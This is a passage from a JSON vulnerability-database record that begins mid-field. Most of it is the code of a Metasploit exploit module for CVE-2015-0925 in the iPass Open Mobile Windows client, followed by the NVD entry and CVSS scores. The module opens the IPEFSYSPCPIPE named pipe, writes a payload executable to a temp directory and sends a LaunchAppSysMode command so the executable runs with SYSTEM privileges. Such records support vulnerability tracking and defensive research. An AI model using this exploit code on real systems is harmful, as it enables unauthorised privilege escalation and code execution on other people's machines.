0xFFFFFFFF\n\n r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0)\n handle = r['return']\n\n return nil if handle == invalid_handle_value\n\n handle\n end\n\n def write_named_pipe(handle, command)\n buffer = Rex::Text.to_unicode(command)\n w = client.railgun.kernel32.WriteFile(handle, buffer, buffer.length, 4, nil)\n\n if w['return'] == false\n print_error('The was an error writing to pipe, check permissions')\n return false\n end\n\n true\n end\n\n\n def is_running?\n begin\n status = service_status('iPlatformService')\n rescue RuntimeError => e\n print_error('Unable to retrieve service status')\n return false\n end\n\n return status && status[:state] == 4\n end\n\n def exploit\n if is_system?\n fail_with(Failure::NoTarget, 'Session is already elevated')\n end\n\n handle = open_named_pipe(\"\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE\")\n\n if handle.nil?\n fail_with(Failure::NoTarget, \"\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE named pipe not found\")\n else\n print_status(\"Opended \\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE! 
Proceeding...\")\n end\n\n if datastore['WritableDir'] and not datastore['WritableDir'].empty?\n temp_dir = datastore['WritableDir']\n else\n temp_dir = client.sys.config.getenv('TEMP')\n end\n\n print_status(\"Using #{temp_dir} to drop malicious exe\")\n\n begin\n cd(temp_dir)\n rescue Rex::Post::Meterpreter::RequestError\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::BadConfig, \"Failed to use the #{temp_dir} directory\")\n end\n\n print_status('Writing malicious exe to remote filesystem')\n write_path = pwd\n exe_name = \"#{rand_text_alpha(10 + rand(10))}.exe\"\n\n begin\n write_file(exe_name, generate_payload_exe)\n register_file_for_cleanup(\"#{write_path}\\\\#{exe_name}\")\n rescue Rex::Post::Meterpreter::RequestError\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::Unknown, \"Failed to drop payload into #{temp_dir}\")\n end\n\n print_status('Sending LauchAppSysMode command')\n\n begin\n write_res = write_named_pipe(handle, \"iPass.EventsAction.LaunchAppSysMode #{write_path}\\\\#{exe_name};;;\")\n rescue Rex::Post::Meterpreter::RequestError\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::Unknown, 'Failed to write to pipe')\n end\n\n unless write_res\n fail_with(Failure::Unknown, 'Failed to write to pipe')\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ipass_launch_app.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:47:50", "description": "The client in iPass Open Mobile before 2.4.5 on Windows allows remote authenticated users to execute arbitrary code via a DLL pathname in a crafted Unicode string that is improperly handled by a subprocess reached through a named pipe, as demonstrated by a UNC share pathname.", "cvss3": {}, "published": "2015-01-22T14:02:00", "type": "cve", "title": "CVE-2015-0925", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0925"], "modified": "2015-01-24T02:26:00", "cpe": ["cpe:/a:ipass:ipass_open_mobile:2.4.4"], "id": "CVE-2015-0925", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0925", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ipass:ipass_open_mobile:2.4.4:*:*:*:*:windows:*:*"]}]}